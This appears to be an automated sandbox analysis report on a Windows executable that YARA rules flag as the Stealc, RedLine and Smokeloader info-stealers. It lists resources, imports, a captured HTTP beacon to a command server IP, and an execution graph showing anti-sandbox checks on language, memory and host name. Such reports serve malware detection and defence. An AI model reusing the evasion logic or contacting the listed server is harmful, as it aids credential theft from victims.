                                    RT_ICON0x27a61180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.3975409836065574
                                    RT_ICON0x27a6aa00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4379432624113475
                                    RT_ICON0x27a6f700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3419509594882729
                                    RT_ICON0x27a7e180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.46525270758122744
                                    RT_ICON0x27a86c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5034562211981567
                                    RT_ICON0x27a8d880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5144508670520231
                                    RT_ICON0x27a92f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42520746887966804
                                    RT_ICON0x27ab8980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43363039399624764
                                    RT_ICON0x27ac9400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43155737704918035
                                    RT_ICON0x27ad2c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4530141843971631
                                    RT_STRING0x27b42380x12cdata0.5266666666666666
                                    RT_STRING0x27b43680x5aedata0.4401650618982118
                                    RT_STRING0x27b49180x504data0.4462616822429907
                                    RT_STRING0x27b4e200x3f2data0.4603960396039604
                                    RT_STRING0x27b52180x706data0.42491657397107896
                                    RT_STRING0x27b59200x792data0.4231166150670795
                                    RT_STRING0x27b60b80x568data0.444364161849711
                                    RT_STRING0x27b66200x84edata0.4172154280338664
                                    RT_STRING0x27b6e700x830data0.4131679389312977
                                    RT_STRING0x27b76a00x896data0.41173794358507737
                                    RT_STRING0x27b7f380x624data0.4351145038167939
                                    RT_STRING0x27b85600x5e0data0.4401595744680851
                                    RT_STRING0x27b8b400x6e6data0.4292185730464326
                                    RT_STRING0x27b92280x67adata0.4312424607961399
                                    RT_STRING0x27b98a80x57edata0.4445234708392603
                                    RT_ACCELERATOR0x27ae3a00x28data1.025
                                    RT_GROUP_CURSOR0x27b0aa00x22data1.0588235294117647
                                    RT_GROUP_CURSOR0x27b19700x14data1.25
                                    RT_GROUP_CURSOR0x27b40600x22data1.088235294117647
                                    RT_GROUP_ICON0x27ad7300x76dataTurkishTurkey0.6694915254237288
                                    RT_GROUP_ICON0x279c4400x76dataTurkishTurkey0.6610169491525424
                                    RT_GROUP_ICON0x27a6f080x68dataTurkishTurkey0.7211538461538461
                                    RT_GROUP_ICON0x27a2c780x76dataTurkishTurkey0.6694915254237288
                                    RT_VERSION0x27b40880x1b0data0.5902777777777778
                                    DLLImport
                                    KERNEL32.dllGetComputerNameA, SetProcessAffinityMask, GetNumaNodeProcessorMask, SetDefaultCommConfigA, GetNumaProcessorNode, GetLocaleInfoA, DebugActiveProcessStop, GetConsoleAliasExesLengthA, CallNamedPipeA, UpdateResourceA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, GlobalAlloc, GetSystemWow64DirectoryW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, SetConsoleCursorPosition, GetFileAttributesW, GetModuleFileNameW, GetConsoleFontSize, GetStringTypeExA, GetStartupInfoA, GetStdHandle, SetLastError, GetProcAddress, VirtualAllocEx, BuildCommDCBW, LoadLibraryA, Process32FirstW, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, SetCalendarInfoW, MoveFileA, SetCommMask, FindAtomA, GetOEMCP, DebugBreakProcess, GetVersionExA, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, MultiByteToWideChar, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetACP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, HeapSize, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, CloseHandle, FlushFileBuffers, GetModuleHandleA
                                    WINHTTP.dllWinHttpOpenRequest
                                    Language of compilation systemCountry where language is spokenMap
                                    TurkishTurkey
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 29, 2024 04:42:00.078298092 CET4973080192.168.2.4194.15.46.65
                                    Oct 29, 2024 04:42:00.084055901 CET8049730194.15.46.65192.168.2.4
                                    Oct 29, 2024 04:42:00.084247112 CET4973080192.168.2.4194.15.46.65
                                    Oct 29, 2024 04:42:00.085136890 CET4973080192.168.2.4194.15.46.65
                                    Oct 29, 2024 04:42:00.091500998 CET8049730194.15.46.65192.168.2.4
                                    Oct 29, 2024 04:42:08.588251114 CET8049730194.15.46.65192.168.2.4
                                    Oct 29, 2024 04:42:08.588341951 CET4973080192.168.2.4194.15.46.65
                                    Oct 29, 2024 04:42:08.588434935 CET4973080192.168.2.4194.15.46.65
                                    Oct 29, 2024 04:42:08.593831062 CET8049730194.15.46.65192.168.2.4
                                    • 194.15.46.65
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730194.15.46.65806920C:\Users\user\Desktop\kNp6KbvVoz.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 29, 2024 04:42:00.085136890 CET87OUTGET / HTTP/1.1
                                    Host: 194.15.46.65
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:23:41:55
                                    Start date:28/10/2024
                                    Path:C:\Users\user\Desktop\kNp6KbvVoz.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\kNp6KbvVoz.exe"
                                    Imagebase:0x400000
                                    File size:746'496 bytes
                                    MD5 hash:0C6E0D5C6DE6558EAB55CE5FAD0B8ACD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:6
                                    Start time:23:42:22
                                    Start date:28/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1332
                                    Imagebase:0xc60000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:4.8%
                                      Dynamic/Decrypted Code Coverage:1.4%
                                      Signature Coverage:4.3%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:32
                                      execution_graph 44542 48c003c 44543 48c0049 44542->44543 44557 48c0e0f SetErrorMode SetErrorMode 44543->44557 44548 48c0265 44549 48c02ce VirtualProtect 44548->44549 44551 48c030b 44549->44551 44550 48c0439 VirtualFree 44555 48c05f4 LoadLibraryA 44550->44555 44556 48c04be 44550->44556 44551->44550 44552 48c04e3 LoadLibraryA 44552->44556 44554 48c08c7 44555->44554 44556->44552 44556->44555 44558 48c0223 44557->44558 44559 48c0d90 44558->44559 44560 48c0dad 44559->44560 44561 48c0dbb GetPEB 44560->44561 44562 48c0238 VirtualAlloc 44560->44562 44561->44562 44562->44548 44563 401190 44570 417a70 GetProcessHeap HeapAlloc GetComputerNameA 44563->44570 44565 40119e 44566 4011cc 44565->44566 44572 4179e0 GetProcessHeap HeapAlloc GetUserNameA 44565->44572 44568 4011b7 44568->44566 44569 4011c4 ExitProcess 44568->44569 44571 417ac9 44570->44571 44571->44565 44573 417a53 44572->44573 44573->44568 44574 416c90 44617 4022a0 44574->44617 44591 4179e0 3 API calls 44592 416cd0 44591->44592 44593 417a70 3 API calls 44592->44593 44594 416ce3 44593->44594 44750 41acc0 44594->44750 44596 416d04 44597 41acc0 4 API calls 44596->44597 44598 416d0b 44597->44598 44599 41acc0 4 API calls 44598->44599 44600 416d12 44599->44600 44601 41acc0 4 API calls 44600->44601 44602 416d19 44601->44602 44603 41acc0 4 API calls 44602->44603 44604 416d20 44603->44604 44758 41abb0 44604->44758 44606 416d29 44607 416dac 44606->44607 44610 416d62 OpenEventA 44606->44610 44762 416bc0 GetSystemTime 44607->44762 44612 416d95 CloseHandle Sleep 44610->44612 44613 416d79 44610->44613 44614 416daa 44612->44614 44616 416d81 CreateEventA 44613->44616 44614->44606 44616->44607 44959 404610 17 API calls 44617->44959 44619 4022b4 44620 404610 34 API calls 44619->44620 44621 4022cd 44620->44621 44622 404610 34 API calls 44621->44622 44623 4022e6 44622->44623 44624 404610 34 API calls 44623->44624 44625 4022ff 44624->44625 44626 404610 34 API calls 44625->44626 44627 402318 44626->44627 44628 404610 34 API calls 44627->44628 44629 402331 44628->44629 44630 404610 34 API calls 44629->44630 44631 40234a 44630->44631 44632 404610 34 API calls 44631->44632 44633 402363 44632->44633 44634 404610 34 API calls 44633->44634 44635 40237c 44634->44635 44636 404610 34 API calls 44635->44636 44637 402395 44636->44637 44638 404610 34 API calls 44637->44638 44639 4023ae 44638->44639 44640 404610 34 API calls 44639->44640 44641 4023c7 44640->44641 44642 404610 34 API calls 44641->44642 44643 4023e0 44642->44643 44644 404610 34 API calls 44643->44644 44645 4023f9 44644->44645 44646 404610 34 API calls 44645->44646 44647 402412 44646->44647 44648 404610 34 API calls 44647->44648 44649 40242b 44648->44649 44650 404610 34 API calls 44649->44650 44651 402444 44650->44651 44652 404610 34 API calls 44651->44652 44653 40245d 44652->44653 44654 404610 34 API calls 44653->44654 44655 402476 44654->44655 44656 404610 34 API calls 44655->44656 44657 40248f 44656->44657 44658 404610 34 API calls 44657->44658 44659 4024a8 44658->44659 44660 404610 34 API calls 44659->44660 44661 4024c1 44660->44661 44662 404610 34 API calls 44661->44662 44663 4024da 44662->44663 44664 404610 34 API calls 44663->44664 44665 4024f3 44664->44665 44666 404610 34 API calls 44665->44666 44667 40250c 44666->44667 44668 404610 34 API calls 44667->44668 44669 402525 44668->44669 44670 404610 34 API calls 44669->44670 44671 40253e 44670->44671 44672 404610 34 API calls 44671->44672 44673 402557 44672->44673 44674 404610 34 API calls 44673->44674 44675 402570 44674->44675 44676 404610 34 API calls 44675->44676 44677 402589 44676->44677 44678 404610 34 API calls 44677->44678 44679 4025a2 44678->44679 44680 404610 34 API calls 44679->44680 44681 4025bb 44680->44681 44682 404610 34 API calls 44681->44682 44683 4025d4 44682->44683 44684 404610 34 API calls 44683->44684 44685 4025ed 44684->44685 44686 404610 34 API calls 44685->44686 44687 402606 44686->44687 44688 404610 34 API calls 44687->44688 44689 40261f 44688->44689 44690 404610 34 API calls 44689->44690 44691 402638 44690->44691 44692 404610 34 API calls 44691->44692 44693 402651 44692->44693 44694 404610 34 API calls 44693->44694 44695 40266a 44694->44695 44696 404610 34 API calls 44695->44696 44697 402683 44696->44697 44698 404610 34 API calls 44697->44698 44699 40269c 44698->44699 44700 404610 34 API calls 44699->44700 44701 4026b5 44700->44701 44702 404610 34 API calls 44701->44702 44703 4026ce 44702->44703 44704 419bb0 44703->44704 44963 419aa0 GetPEB 44704->44963 44706 419bb8 44707 419de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 44706->44707 44708 419bca 44706->44708 44709 419e44 GetProcAddress 44707->44709 44710 419e5d 44707->44710 44711 419bdc 21 API calls 44708->44711 44709->44710 44712 419e96 44710->44712 44713 419e66 GetProcAddress GetProcAddress 44710->44713 44711->44707 44714 419eb8 44712->44714 44715 419e9f GetProcAddress 44712->44715 44713->44712 44716 419ec1 GetProcAddress 44714->44716 44717 419ed9 44714->44717 44715->44714 44716->44717 44718 416ca0 44717->44718 44719 419ee2 GetProcAddress GetProcAddress 44717->44719 44720 41aa50 44718->44720 44719->44718 44721 41aa60 44720->44721 44722 416cad 44721->44722 44723 41aa8e lstrcpy 44721->44723 44724 4011d0 44722->44724 44723->44722 44725 4011e8 44724->44725 44726 401217 44725->44726 44727 40120f ExitProcess 44725->44727 44728 401160 GetSystemInfo 44726->44728 44729 401184 44728->44729 44730 40117c ExitProcess 44728->44730 44731 401110 GetCurrentProcess VirtualAllocExNuma 44729->44731 44732 401141 ExitProcess 44731->44732 44733 401149 44731->44733 44964 4010a0 VirtualAlloc 44733->44964 44736 401220 44968 418b40 44736->44968 44739 40129a 44742 416a10 GetUserDefaultLangID 44739->44742 44740 401249 __aulldiv 44740->44739 44741 401292 ExitProcess 44740->44741 44743 416a73 GetUserDefaultLCID 44742->44743 44744 416a32 44742->44744 44743->44591 44744->44743 44745 416a61 ExitProcess 44744->44745 44746 416a43 ExitProcess 44744->44746 44747 416a57 ExitProcess 44744->44747 44748 416a6b ExitProcess 44744->44748 44749 416a4d ExitProcess 44744->44749 44748->44743 44970 41aa20 44750->44970 44752 41acd1 lstrlenA 44754 41acf0 44752->44754 44753 41ad28 44971 41aab0 44753->44971 44754->44753 44756 41ad0a lstrcpy lstrcatA 44754->44756 44756->44753 44757 41ad34 44757->44596 44759 41abcb 44758->44759 44760 41ac1b 44759->44760 44761 41ac09 lstrcpy 44759->44761 44760->44606 44761->44760 44975 416ac0 44762->44975 44764 416c2e 44765 416c38 sscanf 44764->44765 45004 41ab10 44765->45004 44767 416c4a SystemTimeToFileTime SystemTimeToFileTime 44768 416c80 44767->44768 44769 416c6e 44767->44769 44771 415d60 44768->44771 44769->44768 44770 416c78 ExitProcess 44769->44770 44772 415d6d 44771->44772 44773 41aa50 lstrcpy 44772->44773 44774 415d7e 44773->44774 45006 41ab30 lstrlenA 44774->45006 44777 41ab30 2 API calls 44778 415db4 44777->44778 44779 41ab30 2 API calls 44778->44779 44780 415dc4 44779->44780 45010 416680 44780->45010 44783 41ab30 2 API calls 44784 415de3 44783->44784 44785 41ab30 2 API calls 44784->44785 44786 415df0 44785->44786 44787 41ab30 2 API calls 44786->44787 44788 415dfd 44787->44788 44789 41ab30 2 API calls 44788->44789 44790 415e49 44789->44790 45019 4026f0 44790->45019 44798 415f13 44799 416680 lstrcpy 44798->44799 44800 415f25 44799->44800 44801 41aab0 lstrcpy 44800->44801 44802 415f42 44801->44802 44803 41acc0 4 API calls 44802->44803 44804 415f5a 44803->44804 44805 41abb0 lstrcpy 44804->44805 44806 415f66 44805->44806 44807 41acc0 4 API calls 44806->44807 44808 415f8a 44807->44808 44809 41abb0 lstrcpy 44808->44809 44810 415f96 44809->44810 44811 41acc0 4 API calls 44810->44811 44812 415fba 44811->44812 44813 41abb0 lstrcpy 44812->44813 44814 415fc6 44813->44814 44815 41aa50 lstrcpy 44814->44815 44816 415fee 44815->44816 45745 417690 GetWindowsDirectoryA 44816->45745 44819 41aab0 lstrcpy 44820 416008 44819->44820 45755 4048d0 44820->45755 44822 41600e 45901 4119f0 44822->45901 44824 416016 44825 41aa50 lstrcpy 44824->44825 44826 416039 44825->44826 44827 401590 lstrcpy 44826->44827 44828 41604d 44827->44828 45921 4059b0 44828->45921 44830 416053 46068 411280 44830->46068 44832 41605e 44833 41aa50 lstrcpy 44832->44833 44834 416082 44833->44834 44835 401590 lstrcpy 44834->44835 44836 416096 44835->44836 44837 4059b0 39 API calls 44836->44837 44838 41609c 44837->44838 46075 410fc0 44838->46075 44840 4160a7 44841 41aa50 lstrcpy 44840->44841 44842 4160c9 44841->44842 44843 401590 lstrcpy 44842->44843 44844 4160dd 44843->44844 44845 4059b0 39 API calls 44844->44845 44846 4160e3 44845->44846 46085 411170 44846->46085 44848 4160ee 44849 401590 lstrcpy 44848->44849 44850 416105 44849->44850 46093 411c60 44850->46093 44852 41610a 44853 41aa50 lstrcpy 44852->44853 44854 416126 44853->44854 46437 405000 GetProcessHeap RtlAllocateHeap InternetOpenA 44854->46437 44856 41612b 44857 401590 lstrcpy 44856->44857 44858 4161ab 44857->44858 46445 4108a0 338 API calls 44858->46445 44860 4161b0 44861 41aa50 lstrcpy 44860->44861 44862 4161d6 44861->44862 44863 401590 lstrcpy 44862->44863 44864 4161ea 44863->44864 44865 4059b0 39 API calls 44864->44865 44866 4161f0 44865->44866 46446 4113c0 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 44866->46446 44868 4161fb 44869 401590 lstrcpy 44868->44869 44870 41623b 44869->44870 46447 401ec0 67 API calls 44870->46447 44872 416240 44873 416250 44872->44873 44874 4162e2 44872->44874 44875 41aa50 lstrcpy 44873->44875 44876 41aab0 lstrcpy 44874->44876 44878 416270 44875->44878 44877 4162f5 44876->44877 44879 401590 lstrcpy 44877->44879 44880 401590 lstrcpy 44878->44880 44881 416309 44879->44881 44882 416284 44880->44882 44883 4059b0 39 API calls 44881->44883 44884 4059b0 39 API calls 44882->44884 44885 41630f 44883->44885 44886 41628a 44884->44886 46450 4137b0 36 API calls 44885->46450 46448 411520 21 API calls ctype 44886->46448 44889 4162da 44892 41635b 44889->44892 44895 401590 lstrcpy 44889->44895 44890 416295 44891 401590 lstrcpy 44890->44891 44893 4162d5 44891->44893 44894 416380 44892->44894 44897 401590 lstrcpy 44892->44897 46449 414010 75 API calls 44893->46449 44898 4163a5 44894->44898 44901 401590 lstrcpy 44894->44901 44899 416337 44895->44899 44900 41637b 44897->44900 44903 4163ca 44898->44903 44908 401590 lstrcpy 44898->44908 46451 414300 64 API calls ctype 44899->46451 44960 4046e7 44959->44960 44961 4046fc 11 API calls 44960->44961 44962 40479f 6 API calls 44960->44962 44961->44960 44962->44619 44963->44706 44966 4010c2 ctype 44964->44966 44965 4010fd 44965->44736 44966->44965 44967 4010e2 VirtualFree 44966->44967 44967->44965 44969 401233 GlobalMemoryStatusEx 44968->44969 44969->44740 44970->44752 44972 41aad2 44971->44972 44973 41aafc 44972->44973 44974 41aaea lstrcpy 44972->44974 44973->44757 44974->44973 44976 41aa50 lstrcpy 44975->44976 44977 416ad3 44976->44977 44978 41acc0 4 API calls 44977->44978 44979 416ae5 44978->44979 44980 41abb0 lstrcpy 44979->44980 44981 416aee 44980->44981 44982 41acc0 4 API calls 44981->44982 44983 416b07 44982->44983 44984 41abb0 lstrcpy 44983->44984 44985 416b10 44984->44985 44986 41acc0 4 API calls 44985->44986 44987 416b2a 44986->44987 44988 41abb0 lstrcpy 44987->44988 44989 416b33 44988->44989 44990 41acc0 4 API calls 44989->44990 44991 416b4c 44990->44991 44992 41abb0 lstrcpy 44991->44992 44993 416b55 44992->44993 44994 41acc0 4 API calls 44993->44994 44995 416b6f 44994->44995 44996 41abb0 lstrcpy 44995->44996 44997 416b78 44996->44997 44998 41acc0 4 API calls 44997->44998 44999 416b93 44998->44999 45000 41abb0 lstrcpy 44999->45000 45001 416b9c 45000->45001 45002 41aab0 lstrcpy 45001->45002 45003 416bb0 45002->45003 45003->44764 45005 41ab22 45004->45005 45005->44767 45007 41ab4f 45006->45007 45008 415da4 45007->45008 45009 41ab8b lstrcpy 45007->45009 45008->44777 45009->45008 45011 41abb0 lstrcpy 45010->45011 45012 416693 45011->45012 45013 41abb0 lstrcpy 45012->45013 45014 4166a5 45013->45014 45015 41abb0 lstrcpy 45014->45015 45016 4166b7 45015->45016 45017 41abb0 lstrcpy 45016->45017 45018 415dd6 45017->45018 45018->44783 45020 404610 34 API calls 45019->45020 45021 402704 45020->45021 45022 404610 34 API calls 45021->45022 45023 402727 45022->45023 45024 404610 34 API calls 45023->45024 45025 402740 45024->45025 45026 404610 34 API calls 45025->45026 45027 402759 45026->45027 45028 404610 34 API calls 45027->45028 45029 402786 45028->45029 45030 404610 34 API calls 45029->45030 45031 40279f 45030->45031 45032 404610 34 API calls 45031->45032 45033 4027b8 45032->45033 45034 404610 34 API calls 45033->45034 45035 4027e5 45034->45035 45036 404610 34 API calls 45035->45036 45037 4027fe 45036->45037 45038 404610 34 API calls 45037->45038 45039 402817 45038->45039 45040 404610 34 API calls 45039->45040 45041 402830 45040->45041 45042 404610 34 API calls 45041->45042 45043 402849 45042->45043 45044 404610 34 API calls 45043->45044 45045 402862 45044->45045 45046 404610 34 API calls 45045->45046 45047 40287b 45046->45047 45048 404610 34 API calls 45047->45048 45049 402894 45048->45049 45050 404610 34 API calls 45049->45050 45051 4028ad 45050->45051 45052 404610 34 API calls 45051->45052 45053 4028c6 45052->45053 45054 404610 34 API calls 45053->45054 45055 4028df 45054->45055 45056 404610 34 API calls 45055->45056 45057 4028f8 45056->45057 45058 404610 34 API calls 45057->45058 45059 402911 45058->45059 45060 404610 34 API calls 45059->45060 45061 40292a 45060->45061 45062 404610 34 API calls 45061->45062 45063 402943 45062->45063 45064 404610 34 API calls 45063->45064 45065 40295c 45064->45065 45066 404610 34 API calls 45065->45066 45067 402975 45066->45067 45068 404610 34 API calls 45067->45068 45069 40298e 45068->45069 45070 404610 34 API calls 45069->45070 45071 4029a7 45070->45071 45072 404610 34 API calls 45071->45072 45073 4029c0 45072->45073 45074 404610 34 API calls 45073->45074 45075 4029d9 45074->45075 45076 404610 34 API calls 45075->45076 45077 4029f2 45076->45077 45078 404610 34 API calls 45077->45078 45079 402a0b 45078->45079 45080 404610 34 API calls 45079->45080 45081 402a24 45080->45081 45082 404610 34 API calls 45081->45082 45083 402a3d 45082->45083 45084 404610 34 API calls 45083->45084 45085 402a56 45084->45085 45086 404610 34 API calls 45085->45086 45087 402a6f 45086->45087 45088 404610 34 API calls 45087->45088 45089 402a88 45088->45089 45090 404610 34 API calls 45089->45090 45091 402aa1 45090->45091 45092 404610 34 API calls 45091->45092 45093 402aba 45092->45093 45094 404610 34 API calls 45093->45094 45095 402ad3 45094->45095 45096 404610 34 API calls 45095->45096 45097 402aec 45096->45097 45098 404610 34 API calls 45097->45098 45099 402b05 45098->45099 45100 404610 34 API calls 45099->45100 45101 402b1e 45100->45101 45102 404610 34 API calls 45101->45102 45103 402b37 45102->45103 45104 404610 34 API calls 45103->45104 45105 402b50 45104->45105 45106 404610 34 API calls 45105->45106 45107 402b69 45106->45107 45108 404610 34 API calls 45107->45108 45109 402b82 45108->45109 45110 404610 34 API calls 45109->45110 45111 402b9b 45110->45111 45112 404610 34 API calls 45111->45112 45113 402bb4 45112->45113 45114 404610 34 API calls 45113->45114 45115 402bcd 45114->45115 45116 404610 34 API calls 45115->45116 45117 402be6 45116->45117 45118 404610 34 API calls 45117->45118 45119 402bff 45118->45119 45120 404610 34 API calls 45119->45120 45121 402c18 45120->45121 45122 404610 34 API calls 45121->45122 45123 402c31 45122->45123 45124 404610 34 API calls 45123->45124 45125 402c4a 45124->45125 45126 404610 34 API calls 45125->45126 45127 402c63 45126->45127 45128 404610 34 API calls 45127->45128 45129 402c7c 45128->45129 45130 404610 34 API calls 45129->45130 45131 402c95 45130->45131 45132 404610 34 API calls 45131->45132 45133 402cae 45132->45133 45134 404610 34 API calls 45133->45134 45135 402cc7 45134->45135 45136 404610 34 API calls 45135->45136 45137 402ce0 45136->45137 45138 404610 34 API calls 45137->45138 45139 402cf9 45138->45139 45140 404610 34 API calls 45139->45140 45141 402d12 45140->45141 45142 404610 34 API calls 45141->45142 45143 402d2b 45142->45143 45144 404610 34 API calls 45143->45144 45145 402d44 45144->45145 45146 404610 34 API calls 45145->45146 45147 402d5d 45146->45147 45148 404610 34 API calls 45147->45148 45149 402d76 45148->45149 45150 404610 34 API calls 45149->45150 45151 402d8f 45150->45151 45152 404610 34 API calls 45151->45152 45153 402da8 45152->45153 45154 404610 34 API calls 45153->45154 45155 402dc1 45154->45155 45156 404610 34 API calls 45155->45156 45157 402dda 45156->45157 45158 404610 34 API calls 45157->45158 45159 402df3 45158->45159 45160 404610 34 API calls 45159->45160 45161 402e0c 45160->45161 45162 404610 34 API calls 45161->45162 45163 402e25 45162->45163 45164 404610 34 API calls 45163->45164 45165 402e3e 45164->45165 45166 404610 34 API calls 45165->45166 45167 402e57 45166->45167 45168 404610 34 API calls 45167->45168 45169 402e70 45168->45169 45170 404610 34 API calls 45169->45170 45171 402e89 45170->45171 45172 404610 34 API calls 45171->45172 45173 402ea2 45172->45173 45174 404610 34 API calls 45173->45174 45175 402ebb 45174->45175 45176 404610 34 API calls 45175->45176 45177 402ed4 45176->45177 45178 404610 34 API calls 45177->45178 45179 402eed 45178->45179 45180 404610 34 API calls 45179->45180 45181 402f06 45180->45181 45182 404610 34 API calls 45181->45182 45183 402f1f 45182->45183 45184 404610 34 API calls 45183->45184 45185 402f38 45184->45185 45186 404610 34 API calls 45185->45186 45187 402f51 45186->45187 45188 404610 34 API calls 45187->45188 45189 402f6a 45188->45189 45190 404610 34 API calls 45189->45190 45191 402f83 45190->45191 45192 404610 34 API calls 45191->45192 45193 402f9c 45192->45193 45194 404610 34 API calls 45193->45194 45195 402fb5 45194->45195 45196 404610 34 API calls 45195->45196 45197 402fce 45196->45197 45198 404610 34 API calls 45197->45198 45199 402fe7 45198->45199 45200 404610 34 API calls 45199->45200 45201 403000 45200->45201 45202 404610 34 API calls 45201->45202 45203 403019 45202->45203 45204 404610 34 API calls 45203->45204 45205 403032 45204->45205 45206 404610 34 API calls 45205->45206 45207 40304b 45206->45207 45208 404610 34 API calls 45207->45208 45209 403064 45208->45209 45210 404610 34 API calls 45209->45210 45211 40307d 45210->45211 45212 404610 34 API calls 45211->45212 45213 403096 45212->45213 45214 404610 34 API calls 45213->45214 45215 4030af 45214->45215 45216 404610 34 API calls 45215->45216 45217 4030c8 45216->45217 45218 404610 34 API calls 45217->45218 45219 4030e1 45218->45219 45220 404610 34 API calls 45219->45220 45221 4030fa 45220->45221 45222 404610 34 API calls 45221->45222 45223 403113 45222->45223 45224 404610 34 API calls 45223->45224 45225 40312c 45224->45225 45226 404610 34 API calls 45225->45226 45227 403145 45226->45227 45228 404610 34 API calls 45227->45228 45229 40315e 45228->45229 45230 404610 34 API calls 45229->45230 45231 403177 45230->45231 45232 404610 34 API calls 45231->45232 45233 403190 45232->45233 45234 404610 34 API calls 45233->45234 45235 4031a9 45234->45235 45236 404610 34 API calls 45235->45236 45237 4031c2 45236->45237 45238 404610 34 API calls 45237->45238 45239 4031db 45238->45239 45240 404610 34 API calls 45239->45240 45241 4031f4 45240->45241 45242 404610 34 API calls 45241->45242 45243 40320d 45242->45243 45244 404610 34 API calls 45243->45244 45245 403226 45244->45245 45246 404610 34 API calls 45245->45246 45247 40323f 45246->45247 45248 404610 34 API calls 45247->45248 45249 403258 45248->45249 45250 404610 34 API calls 45249->45250 45251 403271 45250->45251 45252 404610 34 API calls 45251->45252 45253 40328a 45252->45253 45254 404610 34 API calls 45253->45254 45255 4032a3 45254->45255 45256 404610 34 API calls 45255->45256 45257 4032bc 45256->45257 45258 404610 34 API calls 45257->45258 45259 4032d5 45258->45259 45260 404610 34 API calls 45259->45260 45261 4032ee 45260->45261 45262 404610 34 API calls 45261->45262 45263 403307 45262->45263 45264 404610 34 API calls 45263->45264 45265 403320 45264->45265 45266 404610 34 API calls 45265->45266 45267 403339 45266->45267 45268 404610 34 API calls 45267->45268 45269 403352 45268->45269 45270 404610 34 API calls 45269->45270 45271 40336b 45270->45271 45272 404610 34 API calls 45271->45272 45273 403384 45272->45273 45274 404610 34 API calls 45273->45274 45275 40339d 45274->45275 45276 404610 34 API calls 45275->45276 45277 4033b6 45276->45277 45278 404610 34 API calls 45277->45278 45279 4033cf 45278->45279 45280 404610 34 API calls 45279->45280 45281 4033e8 45280->45281 45282 404610 34 API calls 45281->45282 45283 403401 45282->45283 45284 404610 34 API calls 45283->45284 45285 40341a 45284->45285 45286 404610 34 API calls 45285->45286 45287 403433 45286->45287 45288 404610 34 API calls 45287->45288 45289 40344c 45288->45289 45290 404610 34 API calls 45289->45290 45291 403465 45290->45291 45292 404610 34 API calls 45291->45292 45293 40347e 45292->45293 45294 404610 34 API calls 45293->45294 45295 403497 